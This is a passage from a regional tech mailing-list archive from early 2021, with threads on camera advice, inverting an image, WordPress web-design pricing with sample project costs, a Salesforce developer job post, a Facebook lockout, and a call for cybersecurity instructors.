From debchandler411 at gmail.com Mon Feb 1 02:14:34 2021 From: debchandler411 at gmail.com (Deborah Chandler) Date: Sun, 31 Jan 2021 21:14:34 -0500 Subject: [Hidden-tech] * * * Experience with GoPro 9? * * * Message-ID: Hi folks, A friend is contemplating getting a GoPro 9 for his mobile videography work. Are folks here willing to talk with him about your experience and/or opinion about it? Or are there other video cameras you recommend? He currently has a Sony HandiCam. If you could provide your contact info, I will pass it along to him. He's looking to buy this very soon. Thanks! Deb -------------- next part -------------- An HTML attachment was scrubbed... URL: From yudkinyudkin at yahoo.com Mon Feb 1 13:38:31 2021 From: yudkinyudkin at yahoo.com (Marcia Yudkin) Date: Mon, 1 Feb 2021 13:38:31 +0000 (UTC) Subject: [Hidden-tech] Image editing from white on black to black on white? References: <1300459517.724835.1612186711089.ref@mail.yahoo.com> Message-ID: <1300459517.724835.1612186711089@mail.yahoo.com> Hi there, I have an image that has white lettering on a black background and I'm wondering if it's possible to change it to black lettering on a black background. First of all, is there a word for this type of shift? Second, is there an online editing program that can do this? I don't have Photoshop. I have occasionally used Pixlr, but I didn't see a way to do that in that program. Thanks, Marcia Yudkin Goshen From rich at tnrglobal.com Mon Feb 1 16:28:50 2021 From: rich at tnrglobal.com (Rich@tnr) Date: Mon, 1 Feb 2021 11:28:50 -0500 Subject: [Hidden-tech] Image editing from white on black to black on white? In-Reply-To: <1300459517.724835.1612186711089@mail.yahoo.com> References: <1300459517.724835.1612186711089.ref@mail.yahoo.com> <1300459517.724835.1612186711089@mail.yahoo.com> Message-ID: This is not a instant answer but rather an approach We use ImageMagik that has lots of tools for image manipulation for us, it's on linux and also available on many web site backends and there are lots of helpful tips about using IM searching google There are versions for mac or windows and on a lark I looked to see if there is a web version SO (if you want to try) look up at https://magickstudio.imagemagick.org/ Stay well - Rich On 2/1/2021 8:38 AM, Marcia Yudkin via Hidden-discuss wrote: > Hi there, > > I have an image that has white lettering on a black background and I'm wondering if it's possible to change it to black lettering on a black background. First of all, is there a word for this type of shift? > > Second, is there an online editing program that can do this? I don't have Photoshop. I have occasionally used Pixlr, but I didn't see a way to do that in that program. > > Thanks, > > Marcia Yudkin > Goshen > _______________________________________________ > Hidden-discuss mailing list - home page: http://www.hidden-tech.net > Hidden-discuss at lists.hidden-tech.net > > You are receiving this because you are on the Hidden-Tech Discussion list. > If you would like to change your list preferences, Go to the Members > page on the Hidden Tech Web site. > http://www.hidden-tech.net/members > -- Rich Roth CEO TnR Global Bio and personal blog: http://rizbang.com Building the really big sites: http://www.tnrglobal.com Small/Soho business in the PV: http://www.hidden-tech.net Places to meet for business: http://www.meetmewhere.com And for Arts and relaxation: http://TarotMuertos.com - Artistic Tarot Deck http://www.welovemuseums.com http://www.artonmytv.com/ Helping move the world: http://www.earththrives.com From yudkinyudkin at yahoo.com Mon Feb 1 16:32:00 2021 From: yudkinyudkin at yahoo.com (Marcia Yudkin) Date: Mon, 1 Feb 2021 16:32:00 +0000 (UTC) Subject: [Hidden-tech] Image editing from white on black to black on white? In-Reply-To: References: <1300459517.724835.1612186711089.ref@mail.yahoo.com> <1300459517.724835.1612186711089@mail.yahoo.com> Message-ID: <112362825.780990.1612197120356@mail.yahoo.com> Oops, I meant I want to change it to be black lettering on a white background. On 2/1/2021 8:38 AM, Marcia Yudkin via Hidden-discuss wrote: > Hi there, > > I have an image that has white lettering on a black background and I'm wondering if it's possible to change it to black lettering on a black background. First of all, is there a word for this type of shift? > > Second, is there an online editing program that can do this? I don't have Photoshop. I have occasionally used Pixlr, but I didn't see a way to do that in that program. > > Thanks, > > Marcia Yudkin > Goshen > _______________________________________________ > Hidden-discuss mailing list - home page: http://www.hidden-tech.net > Hidden-discuss at lists.hidden-tech.net > > You are receiving this because you are on the Hidden-Tech Discussion list. > If you would like to change your list preferences, Go to the Members > page on the Hidden Tech Web site. > http://www.hidden-tech.net/members > -- Rich Roth CEO TnR Global Bio and personal blog: http://rizbang.com Building the really big sites: http://www.tnrglobal.com Small/Soho business in the PV: http://www.hidden-tech.net Places to meet for business: http://www.meetmewhere.com And for Arts and relaxation: http://TarotMuertos.com - Artistic Tarot Deck http://www.welovemuseums.com http://www.artonmytv.com/ Helping move the world: http://www.earththrives.com _______________________________________________ Hidden-discuss mailing list - home page: http://www.hidden-tech.net Hidden-discuss at lists.hidden-tech.net You are receiving this because you are on the Hidden-Tech Discussion list. If you would like to change your list preferences, Go to the Members page on the Hidden Tech Web site. http://www.hidden-tech.net/members -------------- next part -------------- An HTML attachment was scrubbed... URL: From rich at tnrglobal.com Mon Feb 1 16:33:19 2021 From: rich at tnrglobal.com (Rich@tnr) Date: Mon, 1 Feb 2021 11:33:19 -0500 Subject: [Hidden-tech] who is local who does website ux/ui/branding ? In-Reply-To: References: Message-ID: <6246f433-4a11-789c-7f3e-8152f6cb1b31@tnrglobal.com> SO I didn't get any answers to my prior post for details. I'd like there was local techie's who wanted such work. How about anyone who does website setup/ux/ui/branding respond ? or recommendations for non-locals you used you liked. Respond on the list or directly. As projects come up, I'll ask for quotes Stay Well - Rich -------- Forwarded Message -------- Subject: What is going rate for website ux/ui/branding ? Date: Fri, 29 Jan 2021 14:03:04 -0500 From: Rich at tnr Reply-To: rich at tnrglobal.com To: HT-discuss I am working on a few projects and need some ballpark costs to build into the numbers. The cases would all be for a graphic designer+web developer (type not important: individual, team or company) The site would be Wordpress without needing hosting or technical support - I would be handling that. SO the needs would include: ??? ??? This are medium sized sites, the bulk of content is from various data sources with a few static info pages. ??? ??? Basic branding (no high end commercial branding) ??? ??? Basic rules as to color and look, perhaps including suggested icons. ??? ??? A few sample pages showing these rules ??? ??? Recommending generally available themes/plugins (not including the cost of those) ??? ??? Reasonable response time, not rushed while not more that 2-3 months either. I am looking for comments are to what an effort like this would cost, these is not relatively small budget, rather small projects. Hourly rates by themselves not helpful - total cost is question, although component breakout would be useful This is not a request for a quote, although it is an opportunity to get on my list of to get details from for specific projects. Note: this would also give me a chance to update the Hidden-tech directory as to graphic developers. And please do no respond with anything visual although URLs are welcome. For current timing, sooner would be better - at least one of these is part of a grant proposal that needs to be included by Feb 5th (coming Fri) Stay well all - Rich -- Rich Roth CEO TnR Global Bio and personal blog: http://rizbang.com Building the really big sites: http://www.tnrglobal.com Small/Soho business in the PV: http://www.hidden-tech.net Places to meet for business: http://www.meetmewhere.com And for Arts and relaxation: http://TarotMuertos.com - Artistic Tarot Deck http://www.welovemuseums.com http://www.artonmytv.com/ Helping move the world: http://www.earththrives.com -------------- next part -------------- An HTML attachment was scrubbed... URL: From sam at itabix.com Mon Feb 1 17:05:08 2021 From: sam at itabix.com (Sam McClellan) Date: Mon, 1 Feb 2021 12:05:08 -0500 Subject: [Hidden-tech] Image editing from white on black to black on white? In-Reply-To: <112362825.780990.1612197120356@mail.yahoo.com> References: <1300459517.724835.1612186711089.ref@mail.yahoo.com> <1300459517.724835.1612186711089@mail.yahoo.com> <112362825.780990.1612197120356@mail.yahoo.com> Message-ID: Hi Marcia, That's called inverting the image. You can do that here http://invert.imageonline.co/ or here https://pinetools.com/invert-image-colors or if that doesn't work, just do a google search for invert image online Best, Sam *Sam McClellan* ** *Itabix, Inc* ** *one place for all things **web*** ** *sam at itabix.com* ** *https://itabix.com* ** *Main - 413.587.4600* ** *Toll-free - 877-7ITABIX (877.748.2249) * On 2/1/2021 11:32 AM, Marcia Yudkin via Hidden-discuss wrote: > Oops, I meant I want to change it to be black lettering on a white > background. > > > On 2/1/2021 8:38 AM, Marcia Yudkin via Hidden-discuss wrote: > > Hi there, > > > > I have an image that has white lettering on a black background and > I'm wondering if it's possible to change it to black lettering on a > black background. First of all, is there a word for this type of shift? > > > > Second, is there an online editing program that can do this? I don't > have Photoshop. I have occasionally used Pixlr, but I didn't see a way > to do that in that program. > > > > Thanks, > > > > Marcia Yudkin > > Goshen > > _______________________________________________ > > Hidden-discuss mailing list - home page: http://www.hidden-tech.net > > Hidden-discuss at lists.hidden-tech.net > > > > You are receiving this because you are on the Hidden-Tech Discussion > list. > > If you would like to change your list preferences, Go to the Members > > page on the Hidden Tech Web site. > > http://www.hidden-tech.net/members > > > -- > Rich Roth > CEO TnR Global > > Bio and personal blog: http://rizbang.com > Building the really big sites: http://www.tnrglobal.com > Small/Soho business in the PV: http://www.hidden-tech.net > Places to meet for business: http://www.meetmewhere.com > And for Arts and relaxation: > http://TarotMuertos.com - Artistic Tarot Deck > http://www.welovemuseums.com > http://www.artonmytv.com/ > Helping move the world: http://www.earththrives.com > > > _______________________________________________ > Hidden-discuss mailing list - home page: http://www.hidden-tech.net > Hidden-discuss at lists.hidden-tech.net > > You are receiving this because you are on the Hidden-Tech Discussion list. > If you would like to change your list preferences, Go to the Members > page on the Hidden Tech Web site. > http://www.hidden-tech.net/members > > _______________________________________________ > Hidden-discuss mailing list - home page: http://www.hidden-tech.net > Hidden-discuss at lists.hidden-tech.net > > You are receiving this because you are on the Hidden-Tech Discussion list. > If you would like to change your list preferences, Go to the Members > page on the Hidden Tech Web site. > http://www.hidden-tech.net/members -------------- next part -------------- An HTML attachment was scrubbed... URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: ocmdokgkdnlmdfpb.png Type: image/png Size: 15646 bytes Desc: not available URL: From yudkinyudkin at yahoo.com Mon Feb 1 17:42:03 2021 From: yudkinyudkin at yahoo.com (Marcia Yudkin) Date: Mon, 1 Feb 2021 17:42:03 +0000 (UTC) Subject: [Hidden-tech] Image editing from white on black to black on white? In-Reply-To: References: <1300459517.724835.1612186711089.ref@mail.yahoo.com> <1300459517.724835.1612186711089@mail.yahoo.com> <112362825.780990.1612197120356@mail.yahoo.com> Message-ID: <737849884.813522.1612201323596@mail.yahoo.com> Thank you so much! I'm all set on this now. On Monday, February 1, 2021, 12:12:19 PM EST, Sam McClellan via Hidden-discuss wrote: Hi Marcia, That's called inverting the image. You can do that here http://invert.imageonline.co/ or here https://pinetools.com/invert-image-colors or if that doesn't work, just do a google search for invert image online Best, Sam -------------- next part -------------- An HTML attachment was scrubbed... URL: From snmerz at gmail.com Mon Feb 1 17:52:03 2021 From: snmerz at gmail.com (Sabine Merz) Date: Mon, 1 Feb 2021 12:52:03 -0500 Subject: [Hidden-tech] Facebook locked out- any way to reach them? In-Reply-To: <1300459517.724835.1612186711089@mail.yahoo.com> References: <1300459517.724835.1612186711089.ref@mail.yahoo.com> <1300459517.724835.1612186711089@mail.yahoo.com> Message-ID: <932F2EDB-539C-4BF3-8F16-D992616FDE59@gmail.com> Hello, do any of you have a magical way to reach Facebook? Due to a tech issue I have been locked out of Facebook for over three weeks. I need it for work. I have submitted my personal data at least three times and no response? PS: The reason I am locked out? Two-factor authorization failure on an app I have been using. FB requires me to have two-factor authorization due to a massive FB page I help work on. All recovery efforts have failed. Thank you! Best wishes, Sabine Merz snmerz at gmail.com Northampton -------------- next part -------------- An HTML attachment was scrubbed... URL: From swills at beyond-print.com Tue Feb 2 16:01:55 2021 From: swills at beyond-print.com (swills beyond-print.com) Date: Tue, 2 Feb 2021 11:01:55 -0500 (EST) Subject: [Hidden-tech] who is local who does website ux/ui/branding ? In-Reply-To: <6246f433-4a11-789c-7f3e-8152f6cb1b31@tnrglobal.com> References: <6246f433-4a11-789c-7f3e-8152f6cb1b31@tnrglobal.com> Message-ID: <124973595.236800.1612281715321@webmail.networksolutionsemail.com> An HTML attachment was scrubbed... URL: From nathan at justroots.org Tue Feb 2 18:05:08 2021 From: nathan at justroots.org (Nathan Lyczak) Date: Tue, 2 Feb 2021 13:05:08 -0500 Subject: [Hidden-tech] Salseforce Developer Needed for Just Roots Message-ID: SEEKING A SALESFORCE DEVELOPER (OR DEVELOPMENT TEAM) FOR JUST ROOTS WHO IS JUST ROOTS? Just Roots is a social justice organization that builds equity, connection, health, pride and empowerment in our community and beyond through food-based programs and systems change. Our farm, programming and advocacy efforts connect people to food, opportunity and one another. We do our work by growing food; connecting people of all ages and life experiences with the land; running an all-income CSA (we?ve got the biggest SNAP-enrolled low-income CSA in the state); cooking community meals; developing partnerships with schools, health insurance companies, legislators, health clinics and other resource agencies; researching the health outcomes of CSA participation and more. We build direct access, models, momentum and evidence for change in agricultural policy, food policy, healthcare policy and social justice. We are a small, efficient, farm-based organization with a goal to change the food system and bring more equity to the world. OUR SITUATION: During the past 5 years Just Roots has operated using a custom built Filemaker Pro database solution that barely meets our needs. The volume and sophistication of our work has increased dramatically during the past year, and we have short-term grant funding to move our data onto the Salesforce platform which will be better suited for our long-term future. We seek a highly qualified Salesforce developer individual or team that can work extensively on this project during an urgent six-month timeline (see the following page for our ideal implementation schedule) Our ideal candidate(s) would have proven experience in these areas: - implementing and customizing the Salesforce NPSP for the fundraising and community development needs of non-profit organizations - implementing solutions for managing products, invoicing, and the collection and processing of online and cash payments - the new Salesforce PMM (Program Manager Module) - special needs of the healthcare industry and HIPAA compliance - Deep care for user-experience/functionality that facilitates a smooth, easeful and supportive work environment for staff/partners and smooth communication/information flow with community members - A track record of delivering services ontime and in budget and that meet the expectations of the customer (references required) In addition, our ideal candidate would be a team or be connected with other developers with whom they have a history of collaboration that they could bring in in order to meet project deadlines. We are Immediately accepting applicants. We are interviewing qualified applicants on a rolling basis, so if you think you are the right fit for this position, please reach out! COMPENSATION: $100/hr Please email: nathan at justroots.org to inquire. PROJECT TIMELINE: February-June Exact priorities, order and timeline subject to change PHASE I -- DATA TRANSFER: FEBRUARY 2021 A database of Just Roots contacts (Names, Addresses), with donation history, and program participation history (memberships, events attended, payments), general & confidential notes, other misc information (household demographics, business affiliation, healthcare provider, role, etc) is moved from Filemaker into Salesforce, and all staff are able to use Salesforce to lookup contact information, add notes, record donations, pull reports on contacts individually and collectively etc. PHASE II -- PROGRAM SERVICES WITH INVOICING: MARCH 2021 Salesforce is equipped to manage CSA memberships (and any other future program services) in a way that can handle: - multiple types of memberships / services / products / options / pickup-days / delivery locations / prices / payment methods / payment schedules / delivery routing / invoicing / payment collection / attendance / notes Just Roots should be able to pull reports based on program data (eg: type of membership, product, delivery location) etc. PHASE III -- REFERRALS / DATA EXCHANGE: APRIL 2021 A HIPAA compliant (if necessary) solution is built and/or adopted that allows: 1. Just Roots can receive referrals by logging into online portals of other agencies (AuntBertha / Look4Help / UniteUs) and transfer that data into Just Roots Salesforce -- first via (a) manually reading and retyping, (b) then by export/import, then (c) via automatic API transfer (if needed). 2. Just Roots can report back to other agencies with data about client participation in our services via (a) retyping it into other agencies? portal, (b) sending via export/import data file, then (c) automatic API transfer (if needed). 3. Other agencies can securely log in to a Just Roots web ?portal? to (a) make referrals of clients into Just Roots services and (b) view reports about client participation/notes Just Roots should be able to pull reports based on program data (eg: type of membership, product, delivery location) etc. PHASE IV -- FORM CONNECTIONS & FINANCIAL PROCESSING: MAY 2021 Salesforce is connected via webhooks to a form-building platform and a payment platform where staff can effectively construct clear, logic-based forms hosted on the Just Roots website so that people from the outside world can: (a) register for events and programs (b) make online donations (c) make payments on invoices (d) provide survey responses/input Just Roots must be able to pull reports based on enrollment status, payment status, donations made for certain campaigns or during a certain time period or at a certain level, survey responses, financial projections, money received etc. PHASE V -- COMMUNICATIONS CONNECTIONS: JUNE 2021 Salesforce is connected to an email sending platform and texting platform where transactional and bulk emails and texts can be sent - (?Mail Chimp, Sendgrid, Constant Contact?) These platforms should gracefully handle: - unsubscribes & bouncebacks, - templated transactional messages (?welcome to our CSA?, ?friendly payment reminder?), - and bulk sending of nicely-formatted mass emails (newsletters, appeals)\ Just Roots must be able to pull reports on/for communications. -------------- next part -------------- An HTML attachment was scrubbed... URL: From denisefbatalha at gmail.com Tue Feb 2 16:48:17 2021 From: denisefbatalha at gmail.com (Denise Batalha) Date: Tue, 2 Feb 2021 11:48:17 -0500 Subject: [Hidden-tech] who is local who does website ux/ui/branding ? In-Reply-To: <124973595.236800.1612281715321@webmail.networksolutionsemail.com> References: <6246f433-4a11-789c-7f3e-8152f6cb1b31@tnrglobal.com> <124973595.236800.1612281715321@webmail.networksolutionsemail.com> Message-ID: I'm honestly shocked, as well. I don't know enough to help out, unfortunately, and on the fence on where to go in my career, as far as learning new skills is concerned, such as UX/UI. I only have very basic HTML and website design skills. I honestly wish I could help. I tend to lowball. LOL Mainly for experience, despite being out in the job market FOREVER... and then got a foot in the door, and that was taken away from me, because COVID... LOL Denise On Tue, Feb 2, 2021 at 11:48 AM swills beyond-print.com via Hidden-discuss < hidden-discuss at lists.hidden-tech.net> wrote: > Hi Rich, > > I confess to being a little disappointed that you didn't get any > responses. I was curious and hoping to gain some insight myself from this > as a discussion. That said, one has to be careful that the discussion > doesn't have an appearance of price fixing, which is part of why I didn't > offer anything until now. > > I will say that a young but talented Graphic Artist/web designer friend of > mind puts sites together in the $2500 - $5000 range. That's a price point > I can't compete with. Honestly, I've stayed out of the Wordpress arena > except where a custom API plugin has been required. Even then, most of the > local Western Mass businesses I've talked to opted for manual loading of > their data into WP pages vs. the cost of custom development. > > I would be curious to hear from others on the topic now that the ice is > broken? > > Steve Wills (A hidden-tech in Athol, Ma.) > > On February 1, 2021 11:33 AM Rich at tnr via Hidden-discuss < > hidden-discuss at lists.hidden-tech.net> wrote: > > > SO I didn't get any answers to my prior post for details. > I'd like there was local techie's who wanted such work. > > How about anyone who does website setup/ux/ui/branding respond ? > or recommendations for non-locals you used you liked. > > Respond on the list or directly. > > As projects come up, I'll ask for quotes > Stay Well - Rich > > -------- Forwarded Message -------- > Subject: What is going rate for website ux/ui/branding ? > Date: Fri, 29 Jan 2021 14:03:04 -0500 > From: Rich at tnr > Reply-To: rich at tnrglobal.com > To: HT-discuss > > > I am working on a few projects and need some ballpark costs to build into > the numbers. > > The cases would all be for a graphic designer+web developer (type not > important: individual, team or company) > The site would be Wordpress without needing hosting or technical support - > I would be handling that. > SO the needs would include: > This are medium sized sites, the bulk of content is from various > data sources with a few static info pages. > Basic branding (no high end commercial branding) > Basic rules as to color and look, perhaps including suggested > icons. > A few sample pages showing these rules > Recommending generally available themes/plugins (not including the > cost of those) > Reasonable response time, not rushed while not more that 2-3 > months either. > > I am looking for comments are to what an effort like this would cost, > these is not relatively small budget, rather small projects. > > Hourly rates by themselves not helpful - total cost is question, although > component breakout would be useful > This is not a request for a quote, although it is an opportunity to get on > my list of to get details from for specific projects. > Note: this would also give me a chance to update the Hidden-tech directory > as to graphic developers. > And please do no respond with anything visual although URLs are welcome. > > For current timing, sooner would be better - at least one of these is part > of a grant proposal that needs to be included > by Feb 5th (coming Fri) > > Stay well all - Rich > > -- > Rich Roth > CEO TnR Global > > Bio and personal blog: http://rizbang.com > Building the really big sites: http://www.tnrglobal.com > Small/Soho business in the PV: http://www.hidden-tech.net > Places to meet for business: http://www.meetmewhere.com > And for Arts and relaxation:http://TarotMuertos.com - Artistic Tarot Deck > http://www.welovemuseums.com > http://www.artonmytv.com/ > Helping move the world: http://www.earththrives.com > > _______________________________________________ > Hidden-discuss mailing list - home page: http://www.hidden-tech.net > Hidden-discuss at lists.hidden-tech.net > > You are receiving this because you are on the Hidden-Tech Discussion list. > If you would like to change your list preferences, Go to the Members > page on the Hidden Tech Web site. > http://www.hidden-tech.net/members > > > Please wash hands after reading. > _______________________________________________ > Hidden-discuss mailing list - home page: http://www.hidden-tech.net > Hidden-discuss at lists.hidden-tech.net > > You are receiving this because you are on the Hidden-Tech Discussion list. > If you would like to change your list preferences, Go to the Members > page on the Hidden Tech Web site. > http://www.hidden-tech.net/members > -------------- next part -------------- An HTML attachment was scrubbed... URL: From sam at itabix.com Tue Feb 2 18:27:21 2021 From: sam at itabix.com (Sam McClellan) Date: Tue, 2 Feb 2021 13:27:21 -0500 Subject: [Hidden-tech] who is local who does website ux/ui/branding ? In-Reply-To: <124973595.236800.1612281715321@webmail.networksolutionsemail.com> References: <6246f433-4a11-789c-7f3e-8152f6cb1b31@tnrglobal.com> <124973595.236800.1612281715321@webmail.networksolutionsemail.com> Message-ID: <83d2f1d8-a246-d252-1cbe-3f7847a31bd8@itabix.com> Hi Rich, Sorry I haven't answered until now, lots going on. It's a bit difficult question to answer accurately just based on your description. It seems like they would be simple sites - I'd venture a range between $700 and $1500 depending on how much we'd need to customize the WordPress theme and how we'd connect and display the data sources. And if you wanted multiple sites that use features from the first site, that would lower the cost for the additional sites. I can give you some examples of sites we've done along with their cost. https://connectingpoint.nepm.org/ We just finished doing a complete redesign for New England Public Media's Western Mass television news show. The site was originally an archival site, they wanted to switch it to be more interactive and live and they wanted something very clean and light to highlight the images and video feeds. We switched to a different theme (Divi is our go-to these days). We needed to script the blog pages and the slider to allow for using either an image or a video from either YouTube or their proprietary system. The site includes a timer function, at midnight on Friday it shows a countdown to 6pm along with information information and images about the episode along with buttons for adding you to their mailing list and another to be put on a reminder list for upcoming shows. When the countdown ends at 6pm it refreshes the page and shows the live feed and hides the episode information, then at 6:30 it switches back to the normal site. $2,500. https://presencia.nepm.org/ Also for New England Public Media, we developed this bilingual website for their show. Similar issue with displaying the blog post videos or images. $1730. https://www.aomtheatre.com/ Converted the existing WordPress site and set up a custom ticket selection system. $1400. https://mitsuwa.com/ We develop this site for a Chicago advertising agency that has Mitsuwa, a national Japanese grocery store chain, as their client. The ad agency gives us the design and we implement it. We converted their site to Divi, as well. We developed a complex system for them where they can import a batch of products in an Excel spreadsheet (and upload images) to display their products for each of the stores, for a video feed in their stores, for upcoming sales and for vendors and management to preview upcoming sales before they go live. In addition, they can set up banner images and events with images and text. All of these (product batches, individual banners, and individual events) are set to display in any particular store according to an assigned date range. They keep adding functions so I'll just say the conversion to Divi and basic functions I described were approx. $10,000. We're also currently working on a shopping cart system that organizes pickups and deliveries for $5760. https://www.kimata.com/ Another site we developed for the Chicago advertising agency which supplied the design. A personnel site in English and Japanese displaying available jobs in the US and a separate site for Mexico. We created a backend system for managing both applicants and companies. $7500. https://inner-act.com/ Converted an existing site to WordPress and re-developed it and created the animations, they supplied the logo. $1700. Simpler sites we developed and created the logo for: https://oilco-op.com/ - also developed the slideshow, and developed a custom member signup and management system with three different tiers and different pricing depending on the month you sign up. $1900. https://wellspringneuro.com/ $650. https://adimech.com/ $650. https://optimalbrain.com/ $650. best, Sam *Sam McClellan* ** *Itabix, Inc* ** *one place for all things **web*** ** *sam at itabix.com* ** *https://itabix.com* ** *Main - 413.587.4600* ** *Toll-free - 877-7ITABIX (877.748.2249) * >> Subject: What is going rate for website ux/ui/branding ? >> Date: Fri, 29 Jan 2021 14:03:04 -0500 >> From: Rich at tnr >> Reply-To: rich at tnrglobal.com >> To: HT-discuss >> >> >> >> I am working on a few projects and need some ballpark costs to build >> into the numbers. >> >> The cases would all be for a graphic designer+web developer (type not >> important: individual, team or company) >> The site would be Wordpress without needing hosting or technical >> support - I would be handling that. >> SO the needs would include: >> ??? ??? This are medium sized sites, the bulk of content is from >> various data sources with a few static info pages. >> ??? ??? Basic branding (no high end commercial branding) >> ??? ??? Basic rules as to color and look, perhaps including suggested >> icons. >> ??? ??? A few sample pages showing these rules >> ??? ??? Recommending generally available themes/plugins (not >> including the cost of those) >> ??? ??? Reasonable response time, not rushed while not more that 2-3 >> months either. >> >> I am looking for comments are to what an effort like this would cost, >> these is not relatively small budget, rather small projects. >> >> Hourly rates by themselves not helpful - total cost is question, >> although component breakout would be useful >> This is not a request for a quote, although it is an opportunity to >> get on my list of to get details from for specific projects. >> Note: this would also give me a chance to update the Hidden-tech >> directory as to graphic developers. >> And please do no respond with anything visual although URLs are welcome. >> >> For current timing, sooner would be better - at least one of these is >> part of a grant proposal that needs to be included >> by Feb 5th (coming Fri) >> >> Stay well all - Rich >> >> -- >> Rich Roth >> CEO TnR Global >> >> Bio and personal blog:http://rizbang.com >> Building the really big sites:http://www.tnrglobal.com >> Small/Soho business in the PV:http://www.hidden-tech.net >> Places to meet for business:http://www.meetmewhere.com >> And for Arts and relaxation: >> http://TarotMuertos.com - Artistic Tarot Deck >> http://www.welovemuseums.com >> http://www.artonmytv.com/ >> Helping move the world:http://www.earththrives.com >> >> _______________________________________________ >> Hidden-discuss mailing list - home page: http://www.hidden-tech.net >> Hidden-discuss at lists.hidden-tech.net >> >> You are receiving this because you are on the Hidden-Tech Discussion >> list. >> If you would like to change your list preferences, Go to the Members >> page on the Hidden Tech Web site. >> http://www.hidden-tech.net/members > > Please wash hands after reading. > > _______________________________________________ > Hidden-discuss mailing list - home page: http://www.hidden-tech.net > Hidden-discuss at lists.hidden-tech.net > > You are receiving this because you are on the Hidden-Tech Discussion list. > If you would like to change your list preferences, Go to the Members > page on the Hidden Tech Web site. > http://www.hidden-tech.net/members -------------- next part -------------- An HTML attachment was scrubbed... URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: dhhlebgbpmjlkjnl.png Type: image/png Size: 15646 bytes Desc: not available URL: From rich at tnrglobal.com Wed Feb 3 19:11:01 2021 From: rich at tnrglobal.com (Rich@tnr) Date: Wed, 3 Feb 2021 14:11:01 -0500 Subject: [Hidden-tech] Cybersecurity Instructors - needs Message-ID: <6cced839-f9e6-389f-90b1-184840c97471@tnrglobal.com> See below - respond to Jonathan directly --------------------------------------------------------------------------- From: Jonathan Edwards Subject: Cybersecurity Instructors Message Body: CyberWarrior Academy (www.cyberwarrior.com) is looking for instructors and Teachers Assistants that can teach cybersecurity skills from basic skills such as A+, Security+ and Certified Ethical Hacker, and through other skills such as Network Penetration, Firewalls & IDPS, Malware Analysis, etc. Our next class starts on Monday, March 15th and runs for 28 weeks. Classes are taught Monday through Friday from 5:30pm to 9:30pm. ------------------------------------------------------------------------------ -- Rich Roth CEO TnR Global Bio and personal blog: http://rizbang.com Building the really big sites: http://www.tnrglobal.com Small/Soho business in the PV: http://www.hidden-tech.net Places to meet for business: http://www.meetmewhere.com And for Arts and relaxation: http://TarotMuertos.com - Artistic Tarot Deck http://www.welovemuseums.com http://www.artonmytv.com/ Helping move the world: http://www.earththrives.com From rob at 2disc.com Mon Feb 8 13:52:25 2021 From: rob at 2disc.com (Rob Laporte) Date: Mon, 8 Feb 2021 13:52:25 +0000 Subject: [Hidden-tech] who is local who does website ux/ui/branding ? In-Reply-To: <83d2f1d8-a246-d252-1cbe-3f7847a31bd8@itabix.com> References: <6246f433-4a11-789c-7f3e-8152f6cb1b31@tnrglobal.com> <124973595.236800.1612281715321@webmail.networksolutionsemail.com>, <83d2f1d8-a246-d252-1cbe-3f7847a31bd8@itabix.com> Message-ID: Hi Sam, Wow, Itabix does a lot. Years ago my search marketing firm began extricating ourselves from any web dev, to focus on our core expertise in search marketing and conversion rate optimization, and to avoid the burgeoning complexity, risks, and potential legal liabilities in web dev and hosting. We often refer clients and prospects to firms we like. I have a few questions I share with the HT list here, so all may know. I suggest putting such answers on your About Us page. Who is on your team, and what are their specialties and backgrounds? I?ve found that these days, and increasingly, adequacy, to say nothing of excellence, requires ever more specialization. Website security, technical SEO within general SEO, Local SEO, PPC search vs. display, ROI planning, website design, website coding (even in WP), and more, increasingly demand one dedicated pro for each. If your team can pull off adequacy in all the services on your website--and for the incredible prices you cite--your team and management systems must be first-rate, and worth Western Mass knowing about. Take Care, Rob Laporte Chief Business Development Officer | Founder | Chairman DISC - Making Websites Make Money 413-584-6500 rob at 2disc.com | LinkedIn | 2DISC.com NOTE: Emails can be blocked by spam filters throughout the web. If you don?t get a reply within an expected span of time, please call. ________________________________ From: Hidden-discuss on behalf of Sam McClellan via Hidden-discuss Sent: Tuesday, February 2, 2021 1:27 PM To: hidden-discuss at lists.hidden-tech.net Subject: Re: [Hidden-tech] who is local who does website ux/ui/branding ? Hi Rich, Sorry I haven't answered until now, lots going on. It's a bit difficult question to answer accurately just based on your description. It seems like they would be simple sites - I'd venture a range between $700 and $1500 depending on how much we'd need to customize the WordPress theme and how we'd connect and display the data sources. And if you wanted multiple sites that use features from the first site, that would lower the cost for the additional sites. I can give you some examples of sites we've done along with their cost. https://connectingpoint.nepm.org/ We just finished doing a complete redesign for New England Public Media's Western Mass television news show. The site was originally an archival site, they wanted to switch it to be more interactive and live and they wanted something very clean and light to highlight the images and video feeds. We switched to a different theme (Divi is our go-to these days). We needed to script the blog pages and the slider to allow for using either an image or a video from either YouTube or their proprietary system. The site includes a timer function, at midnight on Friday it shows a countdown to 6pm along with information information and images about the episode along with buttons for adding you to their mailing list and another to be put on a reminder list for upcoming shows. When the countdown ends at 6pm it refreshes the page and shows the live feed and hides the episode information, then at 6:30 it switches back to the normal site. $2,500. https://presencia.nepm.org/ Also for New England Public Media, we developed this bilingual website for their show. Similar issue with displaying the blog post videos or images. $1730. https://www.aomtheatre.com/ Converted the existing WordPress site and set up a custom ticket selection system. $1400. https://mitsuwa.com/ We develop this site for a Chicago advertising agency that has Mitsuwa, a national Japanese grocery store chain, as their client. The ad agency gives us the design and we implement it. We converted their site to Divi, as well. We developed a complex system for them where they can import a batch of products in an Excel spreadsheet (and upload images) to display their products for each of the stores, for a video feed in their stores, for upcoming sales and for vendors and management to preview upcoming sales before they go live. In addition, they can set up banner images and events with images and text. All of these (product batches, individual banners, and individual events) are set to display in any particular store according to an assigned date range. They keep adding functions so I'll just say the conversion to Divi and basic functions I described were approx. $10,000. We're also currently working on a shopping cart system that organizes pickups and deliveries for $5760. https://www.kimata.com/ Another site we developed for the Chicago advertising agency which supplied the design. A personnel site in English and Japanese displaying available jobs in the US and a separate site for Mexico. We created a backend system for managing both applicants and companies. $7500. https://inner-act.com/ Converted an existing site to WordPress and re-developed it and created the animations, they supplied the logo. $1700. Simpler sites we developed and created the logo for: https://oilco-op.com/ - also developed the slideshow, and developed a custom member signup and management system with three different tiers and different pricing depending on the month you sign up. $1900. https://wellspringneuro.com/ $650. https://adimech.com/ $650. https://optimalbrain.com/ $650. best, Sam [cid:part2.949B0F3C.4D2DC5DE at itabix.com] Sam McClellan Itabix, Inc one place for all things web sam at itabix.com https://itabix.com Main - 